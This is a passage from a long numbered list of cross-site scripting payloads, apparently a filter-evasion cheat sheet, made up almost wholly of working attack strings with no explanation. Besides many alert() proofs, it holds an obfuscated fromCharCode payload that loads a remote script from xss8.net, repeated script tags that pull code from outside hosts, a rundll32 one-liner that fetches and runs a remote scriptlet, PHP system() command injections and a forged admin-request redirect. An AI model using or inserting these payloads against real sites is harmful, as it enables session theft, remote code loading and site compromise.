  4630. <p><img class=”reference” contenteditable=”false” data-refid=”2" data-type=”reference” onerror=”eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))” src=”http://img.baidu.com/img/baike/editor/reference.gif" unselectable=”on” /></p>
  4631. <p><img src=”https://attacker/?data=</p>
  4632. p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
  4633. p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
  4634. p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
  4635. <pkav xmlns=”><iframe onload=alert(1)”>123</pkav>
  4636. <plaintext>
  4637. <plaintext/onmousemove=prompt(1)>renwa
  4638. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  4639. ?playerID=a\”;))}catch(e){confirm(document.domain)}//
  4640. ?playerready=alert(document.cookie)
  4641. player.swf?playerready=alert(document.cookie)
  4642. player.swf?tracecall=alert(document.cookie)
  4643. plupload.flash.swf?%#target%g=alert&uid%g=XSS&
  4644. <p onbeforescriptexecute=”alert(1)”><svg><script>\</p>
  4645. <p/onclick=alert(/INJECTX/)>a
  4646. <p oncut=alert(1)>A
  4647. <p/oncut=alert(1)>A
  4648. p=’onload=alert(1)><svg/1=’
  4649. <p onmouseover=alert(/1/)>xxx</p>
  4650. <p/onmouseover=javascript:alert(1); >M</p>
  4651. {{[].pop.constructor(‘alert()’)()}}
  4652. p=\&q=-alert(1)//
  4653. preg_replace(/on\w+\s*=|\>/i, -, $_REQUEST[q]);
  4654. preg_replace(/\<script|=/i, -, $_REQUEST[q]);
  4655. prerequisite: \” => \\\”
  4656. previousSibling.nodeValue, document.body.textContent*
  4657. print ctx.eval(u”’\N{HEAVY BLACK HEART}’”)
  4658. ${@print(system(a?whoamia?))}
  4659. ${@print(system(��dir��))}
  4660. ${@print(system($_SERVER[‘HTTP_USER_AGENT’]))}
  4661. process.open(“/Applications/Calculator.app/Contents/MacOS/Calculator”);
  4662. prompt(0x0064)
  4663. ‘?prompt`1`?’
  4664. ‘*prompt(1)*’
  4665. p’rompt(1)
  4666. prompt(1)-eval(JSON.parse(name).input)
  4667. “(prompt(1))in”
  4668. ;prompt(1)//��;prompt(2)//��;prompt(3)//�V></SCRIPT>��>��><SCRIPT>prompt(4)</SCRIPT>
  4669. “^prompt(9)^”
  4670. “<<prompt(9)<<”
  4671. “<=prompt(9)<=”
  4672. “<prompt(9)<”
  4673. “===prompt(9)===”
  4674. “==prompt(9)==”
  4675. “>=prompt(9)>=”
  4676. “>>>prompt(9)>>>”
  4677. “>>prompt(9)>>”
  4678. “>prompt(9)>”
  4679. “||prompt(9)||”
  4680. “|prompt(9)|”
  4681. “-prompt(9)-”
  4682. “!=prompt(9)!=”
  4683. “?prompt(9):”
  4684. “/prompt(9)/”
  4685. “*prompt(9)*”
  4686. prompt(9)
  4687. prompt`${document.domain}`
  4688. prompt(location.hash)
  4689. //prompt.ml%2f@??
  4690. //prompt.ml%2f@?.ws/?
  4691. prompt = p\u0072om\u0070\u0074
  4692. Prompt = p\u0072om\u0070\u0074
  4693. prompt(‘xss’)
  4694. protected $_expressions = array(
  4695. prototype.join=function(){confirm(“PWND:”+document.body.innerHTML)}’)();
  4696. p=*/</script>’>alert(1)/*<script/1=’
  4697. p[<script>`]=`/alert(70)</script>
  4698. <P><SPAN class=xmsw title=~?O? onmo&#117;&#115;eout=”window.loca&#116;ion=’http://www.xfydyt.com'">F?A?~M</SPAN></P>
  4699. <P STYLE=”behavior:url(‘#default#time2’)” end=”0" onEnd=”javascript:alert(1)”>
  4700. <p style=”font-family:’ar\27 \3bx\3a expression\28xss\28\29\29\3bial’;”></p>
  4701. <p style=”font-family:’foo&amp;#x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(confirm(1))’”>
  4702. <p style=overflow:auto;font-size:1000px onscroll=alert(33)>script<k/id=die>
  4703. p=<svg/1=’&q=’onload=alert(1)>
  4704. p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
  4705. p=<svg 1=’&q=onload=’/*&r=*/alert(1)’>
  4706. p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id>
  4707. p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
  4708. *&p=<svg/onload=eval(0+location.search)>&*/1:alert(document.domain)
  4709. *&p=<svg/onload=eval%280%2Blocation.search%29>&*/1:alert%28document.domain%29
  4710. “‘`><p><svg><script>a=’hello\x27;javascript:alert(1)//’;</script></p>
  4711. <p>This is a secret text.</p>
  4712. pune<script>alert(document.cookie)</script>
  4713. =pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
  4714. p=’/wp-admin/plugin-editor.php?’
  4715. <?PXML><html:script>alert(29)</html:script>
  4716. <PXML><html:script>alert(30)</html:script>
  4717. ?q=<body style=overflow:auto;height:1000px onscroll=alert(1337) id=x>
  4718. ?q=%ED%A0%80\”))}catch(e){alert(1)}//
  4719. q=e=>{return e};q.constructor(String.raw(q`a${0}e${0}t${0}1337)`,’l’,’r’,’(‘))();
  4720. <Q%^&*(�G@!���� style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
  4721. <q/oncut=alert()>
  4722. <q/oncut=alert(1)>
  4723. <q/oncut=confirm()
  4724. <q/oncut=open>
  4725. <q/oncut=open()>
  4726. ‘/><q/oncut=open()>//
  4727. Qp4LnNlbmQoJCk=
  4728. \&quot;;alert(&apos;XSS&apos;);//
  4729. &quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
  4730. >&quot;&gt;&lt;script&gt;confirm(&#039;hi&#039;)&lt;/script&gt;&quot;&lt;</a>value=””><script>confirm(‘hi’)</script>”<”/>
  4731. RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
  4732. React.createElement
  4733. {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (‘’+’’.toString(‘F = Function.prototype;’ + ‘F.apply = F.a;’ + ‘delete F.a;’ + ‘delete F.valueOf;’ + ‘alert(1);’)));}}
  4734. <rect fill=”white” style=”clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);”/>
  4735. <rect width=��1000�� height=��1000�� fill=��white��/></a></svg>
  4736. Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  4737. Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
  4738. Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
  4739. Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
  4740. Reflect.set(location, ‘href’, ‘javascript:alert(1)’)
  4741. .replace(/.+/,eval)//
  4742. res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
  4743. **/ression(alert(/1/))”>1</div>
  4744. Result => javas + cript: + ale + rt + ( + 1 + )
  4745. Result => javas + cript: + ale + rt + (1)
  4746. Result => javascript:alert(1)
  4747. Result => javascript: + /*click me! + #*/alert(1)
  4748. Result => javascript: +’click me! + #’-alert(1)
  4749. Result => javas + script: + ale + rt + (1)
  4750. Results for <?php echo $_GET[‘q’];?>”:
  4751. return bindingFunction(bindingContext,node);
  4752. return new Function(“$context”,”$element”, functionBody);
  4753. “‘<>\r\n\ being escaped
  4754. ) = &rpar;
  4755. (_+`rt(let)`)``
  4756. rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;o=GetObject(“script:http://goo.gl/jApjhr “);o.Exec();close();
  4757. <s “‘“=”” 000=””>
  4758. “‘“><s/000 “‘“><s/000
  4759. <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
  4760. <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
  4761. <S% 00c% 00r% 00% 00ip% 00t> confirm (0); </ s% 00c% 00r% 00% 00ip% 00t>
  4762. <S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>
  4763. s1=0?’1':’i’; s2=0?’1':’fr’; s3=0?’1':’ame’; i1=s1+s2+s3; s1=0?’1':’jav’; s2=0?’1':’ascr’; s3=0?’1':’ipt’; s4=0?’1':’:’; s5=0?’1':’ale’; s6=0?’1':’rt’; s7=0?’1':’(1)’; i2=s1+s2+s3+s4+s5+s6+s7;
  4764. s1=0?’’:’i’;s2=0?’’:’fr’;s3=0?’’:’ame’;i1=s1+s2+s3;s1=0?’’:’jav’;s2=0?’’:’ascr’;s3=0?’’:’ipt’;s4=0?’’:’:’;s5=0?’’:’ale’;s6=0?’’:’rt’;s7=0?’’:’(1)’;i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
  4765. s1=’java’||’’+’’;s2=’scri’||’’+’’;s3=’pt’||’’+’’;
  4766. s1=[‘java’||’’+’’]; s2=[‘scri’||’’+’’]; s3=[‘pt’||’’+’’];
  4767. s1=[‘java’+’’+’’+’scr’+’ipt’+’:’+’aler’+’t’+’(1)’];
  4768. s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’; u1=s1+s2+s3;URL=u1
  4769. s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’;u1=s1+s2+s3;URL=u1
  4770. s1=!’’&&’jav’;s2=!’’&&’ascript’;s3=!’’&&’:’;s4=!’’&&’aler’;s5=!’’&&’t’;s6=!’’&&’(1)’;s7=s1+s2+s3+s4+s5+s6;URL=s7;
  4771. s1=<s>evalalerta(1)a</s>,s2=<s></s>+’’,s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
  4772. ><s”%2b”cript>alert(document.cookie)</s”%2B”cript>
  4773. ><s%2bcript>alert(document.cookie)</script>
  4774. “><s”%2b”cript>alert(document.cookie)</script>
  4775. ��><s��%2b��cript>alert(document.cookie)</script>
  4776. ><s%2bcript>alert(/Xss-By-Muhaddi/)</script>
  4777. ><s%2bcript>alert(/Xss/)</script>
  4778. ��><s��%2b��cript>alert(/Xss/)</script>
  4779. <! — sample vector → <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>
  4780. <ScaleLoadingMov>1</ScaleLoadingMov>
  4781. <sc#ipt> continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
  4782. <sc#ipt>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
  4783. <sc#ipt>if(top!=self)top.location=location</script>
  4784. <SCR%00IPT>alert(“XSS”)</SCRIPT>
  4785. <SCR%00IPT>confirm(document.location)</SCR%00IPT>
  4786. <scr%00ipt>prompt(1)</sc%00ript>
  4787. <scr%00ript>confirm(0);</scr%00ipt>
  4788. <scr\0ipt>prompt(1)</sc\0ript>
  4789. <<scr\0ipt/src=http://xss.com/xss.js></script
  4790. <<scr\0ipt/src=http://xss.cx/xss.js></script
  4791. “><scr&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;&#60;&#47;&#115;&#99;&#114;&#105;pt>
  4792. <scr<! — esi →ipt>aler<! — esi →t(1)</sc<! — esi →ript>
  4793. <scri%00ipt>confirm(0);</script>
  4794. <scri%00pt>alert(1);</scri%00pt>
  4795. <Scri% 00pt> alert (1); </ scri% 00pt>
  4796. <scri%00pt>confirm(0);</scri%00pt>
  4797. ><scri%00pt>confirm(0);</scri%00pt>
  4798. “<scri%00pt>confirm(0);</scri%00pt>”
  4799. “\”><scri%00pt>confirm(0);</scri%00pt>”,
  4800. <scri%00pt>confirm(1);</scri%00pt>
  4801. </script>
  4802. <script>/*
  4803. <script>
  4804. “<! — <script>”
  4805. “<! — script>”
  4806. “><script>”
  4807. */</script>
  4808. <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
  4809. <script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/
  4810. <script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0��//(%000000%0dalert(1)
  4811. <script/%00%00v%00%00>alert(/renwax23/)</script>
  4812. <script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0a3//(%000000%0dconfirm(1)//
  4813. <script>({0:#0=alert/#0#/#0#(0)})</script>
  4814. <script>({0:#0=alert/#0#/#0#(123)})</script>
  4815. <script%00>alert(1)</script%00>
  4816. <script>({0:#0=confirm/#0#/#0#(0)})</script>
  4817. <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  4818. <script%0a%0dConfirm(1);</script>
  4819. <script>//>%0Aalert(1);</script>
  4820. </script%0A-_-><script>confirm(1)</script%0A-_->
  4821. <script%0Caaaaa>alert(123)</script>
  4822. <script>(0)[‘constructor’][‘constructor’](“\141\154\145\162\164(1)”)();</script>
  4823. <script%0Daaa>alert(1)</script%0Daaaa>
  4824. <script>++1-+?(1)</script>
  4825. <script>+-+-1-+-+alert(1)</script>
  4826. <script>/<1/>alert(document.domain)</script></svg>
  4827. <script>$=1,alert($)</script>
  4828. <script>$=1,alert($)</script>//INJECTX
  4829. “<script>1-confirm(0);</script>”/>
  4830. <script>+-+-1-+-+confirm(1)</script>
  4831. “/><script>+-+-1-+-+confirm(1)</script>
  4832. <script>1</script>
  4833. <script>$=1,\u0061lert($)</script>
  4834. >”><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
  4835. <ScRiPt%20>prompt(document.domain)</ScRiPt>
  4836. <script%20src%3D”http%3A%2F%2F0300.0250.0000.0001">
  4837. <script%20src%3D”http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>
  4838. <script%20src=”//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
  4839. <script%20TEST>alert(1)</script%20TESTTEST>
  4840. <ScRipT 5–0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  4841. <ScRipT 5–0*3?=>prompt(1)</ScRipT giveanswerhere=?
  4842. <script>’a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
  4843. <script>a=’abc\*chr*\’;log(*num*)//def’;</script>
  4844. <;SCRIPT a=”;blah”; ‘;’; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  4845. <SCRIPT a=”blah” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  4846. <SCRIPT>a=document.cookie
  4847. <script>a=eval;b=alert;a(b(/ 1/.source));</script>’”>
  4848. <script>a=eval;b=alert;a(b(/i/.source));</script>
  4849. <SCRIPT “a=’>’” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
  4850. <SCRIPT a=`>` id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
  4851. <SCRIPT a=”>” ‘’ id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
  4852. <SCRIPT a=”>” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
  4853. <script>a=`jackmasa<! — <script/\`;</script>
  4854. <script ~~~>alert(0%0)</script ~~~>
  4855. `><script>alert(0)</script>
  4856. <<script>alert(0)</script>
  4857. ‘’;! — “<script>alert(0);</script>=&{()}
  4858. “><script>alert(0)</script>
  4859. ‘’;! — “<script>alert(0);</script>=&{(alert(1))}
  4860. </script>”-alert(0)-”><svg onload=’;alert(178);’>
  4861. \”><script>alert(0x000123)</script>
  4862. \”><sCriPt>alert(0x000123)</sCriPt>
  4863. <script>alert(1)//
  4864. <script>alert(1)//
  4865. “><script>alert(1)<! — 
  4866. “><script>alert(1)//
  4867. *//><script>/*alert(1)//
  4868. *//”><script>/*alert(1)//
  4869. <script>alert(1)%0d%0a →%09</script
  4870. <script>alert(1234)</script>
  4871. /<script>alert(1234)</script>
  4872. <ScripT>alert(1234)</ScRipT>
  4873. /<script>alert(1234)</script>##0
  4874. <script>alert(123)</script>
  4875. ><script>alert(123)</script>
  4876. →<script>alert(123)</script>
  4877. ‘><script>alert(123)</script>
  4878. “><script>alert(123)</script>
  4879. scriptalert(123)/script
  4880. &<script>alert(123)</script>=123
  4881. ><script>alert(123);</script x=
  4882. ‘><script>alert(123);</script x=’
  4883. “><script>alert(123);</script x=”
  4884. <script>alert(129)//
  4885. <script>alert(130)<!�V
  4886. <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
  4887. “><script>alert(1337)</script>”><script>alert(“XSS by \nxss</h1></marquee>
  4888. */</script>’>alert(157)/*<script/157=’
  4889. <script>alert(159)</script>
  4890. <script>alert(‘1’)</alert>
  4891. <script>alert(1);&b=bar
  4892. <script>alert(1);/*&b=*/</script>
  4893. <script>({[alert(1)](){}});({get[alert(2)](){}});({set[alert(3)](a){}});</script>
  4894. <script>alert(1)<! — INJECTX
  4895. <script>alert(1)//INJECTX
  4896. <script>alert(1)&lt/script&gt&#039;><button>CLICK
  4897. <%<! — ‘%><script>alert(1);</script →
  4898. <script<{alert(1)}/></script </>
  4899. <script>/* */alert(1)/* */</script>
  4900. <script>/&/-alert(1)</script>
  4901. <script>”=>” * alert(1)</script>
  4902. <script>({‘ \ ‘(){alert(1)}})[` \ `]()</script>
  4903. <script>alert`1`</script>
  4904. <script>alert(1)</script>
  4905. <script>alert(1)</script>
  4906. <script>alert(1)</script
  4907. <script>alert(1);</script>
  4908. <script /**/>/**/alert(1)/**/</script /**/
  4909. ???script?alert(1)?/script?
  4910. <scRipt>alErt(1)</scrIpt>
  4911. <scRiPt>alert(1);</scrIPt>
  4912. <sCrIpt>alert(1)</script>
  4913. <sCrIpt>alert(1)</ScRipt>
  4914. <sCRiPt>alert(1);</sCRipT>
  4915. <Script>alert(1)</Script>
  4916. <ScRiPt>alert(1)</sCriPt>
  4917. <<SCRIPT>alert(1);//<</SCRIPT>
  4918. */</script>’>alert(1)/*<script/1=’
  4919. &”><script>alert(1)</script>=1
  4920. “><script>alert(1)</script>=1”onPaste=”eval(‘;)\’SSX\’(trela’.split(‘’).reverse().join(‘’))”
  4921. <script>-=alert;-(1)</script> “onmouseover=”confirm(document.domain);”” </script>
  4922. <script>alert(1);</script> <script>prompt(1);</script> <script>confirm (1);</script> <script src=”http://rhainfosec.com/evil.js">
  4923. <script>alert(1)<!�V
  4924. <script>alert(1)<!V
  4925. <script>alert`1`;var something = `abc${alert(1)}def`;``.constructor.constructor`alert\`1\````;</script>
  4926. <script/&>alert(25)</script>
  4927. <script>alert(2)</script> “><img src=x onerror=prompt(document.domain)>
  4928. <script>alert(2)&sol;&sol;!#ERROR?&^%$#</script>
  4929. <script>alert(/3/)</script>
  4930. ‘> <script>alert(3)</script>
  4931. > <script>alert(4)</script>
  4932. `> <script>alert(5)</script>
  4933. <script>/&/-alert(7)</script>
  4934. <script>alert(/7/.source)</script>
  4935. <script>+alert(88199)</script>
  4936. <script>alert(/88199/)</script>
  4937. <script>alert(88199)</script>
  4938. <script>alert(/88199/.source)</script>
  4939. “><script>alert(9)</script><a”
  4940. <script>alert(9)</script<br>
  4941. ]]><script>alert(9)</script><![CDATA[
  4942. <script>alert(document.cookie)</script>”>
  4943. <script>alert(document.cookie)</script>
  4944. =’><script>alert(document.cookie)</script>
  4945. ><<script>alert(document.cookie);//<</script>
  4946. ‘><script>alert(document.cookie)</script>
  4947. ‘><script>alert(document.cookie);</script>
  4948. “><<script>alert(document.cookie);//<</script>
  4949. “><script>alert(document.cookie)</script>/><’:
  4950. “><script>alert(document.cookie)</script>
  4951. “/><script>alert(document.cookie);</script>
  4952. ��><<script>alert(document.cookie);//<</script>
  4953. ><ScRiPt>alert(document.cookie)</script>
  4954. ��><ScRiPt>alert(document.cookie)</script>
  4955. “>’><SCRIPT>alert(document.cookie)</SCRIPT>
  4956. <script>alert(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
  4957. <script>alert(document.domain)</script>
  4958. <script>alert(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
  4959. <script>alert(document.head.childNodes[3].text)</script>
  4960. <script>alert(document.head.innerHTML.substr(146,20));</script>
  4961. “><script>alert(document.location)</script><”
  4962. ?script?alert(�FXSS�F)?/script?
  4963. ?script?alert(FXSSF)?/script?
  4964. <script>alert(“hellox worldss”);</script>
  4965. <script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  4966. <ScRipt>ALeRt(“hi”);</sCRipT>
  4967. <script>alert(navigator.userAgent)<script>
  4968. <script>alert(String.fromCharCode(49,49))</script>
  4969. <script>alert(String.fromCharCode(49))</script>
  4970. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  4971. “><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  4972. <script>alert(String.fromCharCode(88,83,83))</script>
  4973. “><script>alert(String.fromCharCode(88,83,83))</script>
  4974. “><script alert(String.fromCharCode(88,83,83))</script>
  4975. “><script alert(String.fromCharCode(88,83,83))</script>
  4976. <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  4977. <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  4978. ‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=’
  4979. “><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=”
  4980. \’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=\’
  4981. <SCRIPT>alert(String.fromCharCode(88))</SCRIPT>
  4982. “><script>alert(‘test’)</script>
  4983. <<SCRIPT>alert(“test”);//<</SCRIPT>
  4984. <<script>alert(“WXSS”);//<</script>
  4985. <script>alert(“WXSS”)</script>
  4986. ><ScRiPt>alert(Xss-By-Muhaddi)</sCrIpT>
  4987. <<SCRIPT>alert(Xss-By-Muhaddi);//<</SCRIPT>
  4988. <script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
  4989. “><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
  4990. ><ScRiPt>alert(xss by shawar)</sCrIpT>
  4991. >/”><script>alert(‘xss message’)</script>
  4992. ‘<script>alert(‘xss message’)</script>
  4993. “><script>alert(‘xss message’)</script>
  4994. =’><script>alert(“xss”)</script>
  4995. →<script>alert(xss);<script>
  4996. ! — “ /><script>alert(‘xss’);</script>
  4997. <script>alert(��Xss��)</script>
  4998. <script>alert(Xss)</script>
  4999. ><script>alert(/Xss/)</script>
  5000. ><script>alert(Xss)</script>
  5001. ��><script>alert(/Xss/)</script>
  5002. ��><script>alert(��Xss��)</script>
  5003. <! — — →<script>alert(‘XSS’);</script><! — — →
  5004. <script>alert(‘XSS’)</script>
  5005.  
  5006. <script>alert(‘XSS’);</script>
  5007. <script>alert(&XSS&)</script>
  5008. >”><script>alert(“XSS”)</script>&
  5009. ‘“><script>alert(‘XSS’)</script>
  5010. ‘“>><script>alert(‘XSS’)</script>
  5011. ‘“>><script>alert(‘XSS’)</script>
  5012. “><script>alert(‘XSS’)</script>
  5013. “><script>alert(��XSS��);</script>
  5014. “><script>alert(XSS);</script>
  5015. &<script>alert(‘XSS’);</script>”>
  5016. <ScRipt>ALeRt(XSS);</sCRipT>
  5017. ><ScRiPt>alert(Xss)</sCrIpT>
  5018. ��><ScRiPt>alert(��Xss��)</sCrIpT>
  5019. <<SCRIPT>alert(��Xss��);//<</SCRIPT>
  5020. <<SCRIPT>alert(Xss);//<</SCRIPT>
  5021. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  5022. <<SCRIPT>alert(XSS);//<</SCRIPT>
  5023. <;<;SCRIPT>;alert(“;XSS”;);//<;<;/SCRIPT>;
  5024. <;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;
  5025. <?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
  5026. <?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
  5027. <SCRIPT> alert(��XSS��); </SCRIPT>
  5028. <SCRIPT> alert(XSS); </SCRIPT>
  5029. <SCRIPT>alert(‘XSS’)</SCRIPT>
  5030. <SCRIPT>alert(‘XSS’);</SCRIPT>
  5031. <script>alert(‘xss’);</script>
  5032. <script>alert(“xss”);</script>
  5033. ‘/*<script>alert(“xss”)</script>*/%2B’
  5034. <script>alert(“XSS”);</script>&search=1
  5035. <SCRIPT>alert(/XSS/.source)</SCRIPT>
  5036. <script>alert(yXSSz)</script>.
  5037. <script>alert(yXSSz)</script>
  5038. <script>/&amp;/-alert(1)</script>
  5039. <script>[{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]</script>
  5040. <script’ + Array(999999).join(‘/’) + ‘>alert(1)<\/script>
  5041. <script>Array.from`1${alert}3${window}2`</script>
  5042. <script>Array.from([1],alert)</script>
  5043. <script>Array.from`${eval}alert\`1\``</script>
  5044. <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js"></SCRIPT>
  5045. <SCRIPT a=`>` SRC=”http://3w.org/xss.js"></SCRIPT>
  5046. <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js"></SCRIPT>
  5047. <SCRIPT a=”>” “ SRC=”http://3w.org/xss.js"></SCRIPT>
  5048. <SCRIPT a=”>” SRC=”http://3w.org/xss.js"></SCRIPT>
  5049. <;SCRIPT “;a=’;>;’;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  5050. <;SCRIPT a=`>;` SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  5051. <;SCRIPT a=”;>;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  5052. <;SCRIPT a=”;>’;>”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  5053. <SCRIPT “a=’>’” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5054. <SCRIPT a=`>` SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5055. <SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5056. <SCRIPT a=”>” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5057. <SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5058. <SCRIPT+a=”>’>” SRC=”http://localhost"></SCRIPT>
  5059. <script “a=’>’” SRC=”http://www.securitycompass.com/xss.js"></script>
  5060. <script a=`>` SRC=”http://www.securitycompass.com/xss.js"></script>
  5061. <script a=”>’>” SRC=”http://www.securitycompass.com/xss.js"></script>
  5062. <script a=”>” ‘’ SRC=”http://www.securitycompass.com/xss.js"></script>
  5063. <script a=”>” SRC=”http://www.securitycompass.com/xss.js"></script>
  5064. <SCRIPT “a=’>’” SRC=”http://xss.cx/xss.js"></SCRIPT>
  5065. <SCRIPT a=`>` SRC=”http://xss.cx/xss.js"></SCRIPT>
  5066. <SCRIPT a=”>” ‘’ SRC=”http://xss.cx/xss.js"></SCRIPT>
  5067. <SCRIPT a=”>” SRC=”http://xss.cx/xss.js"></SCRIPT>
  5068. <SCRIPT “a=’>’” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
  5069. <SCRIPT a=”>” ‘’ src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
  5070. <SCRIPT a=”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
  5071. <SCRIPT a=”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
  5072. <SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
  5073. <;SCRIPT>;a=/XSS/
  5074. <SCRIPT>a=/XSS/
  5075. <SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>
  5076. <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
  5077. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  5078. “‘`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>
  5079. <SCRIPT>a=/XSS/nalert(‘XSS’);</SCRIPT>
  5080. <script>a=/XSS/\ndocument.vulnerable=true;</script>
  5081. <script>/*//&b=*/alert(1);</script>
  5082. <SCRIPT <B>=alert(‘XSS’);”></SCRIPT>
  5083. ?”></script><base%20c%3D=href%3Dhttps:\mysite>
  5084. <script>’bbbalert(1)cccc’.replace(/a\w{4}\(\d\)/,eval)</script>
  5085. <script <B>document.vulnerable=true;</script>
  5086. <;SCRIPT =”;blah”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
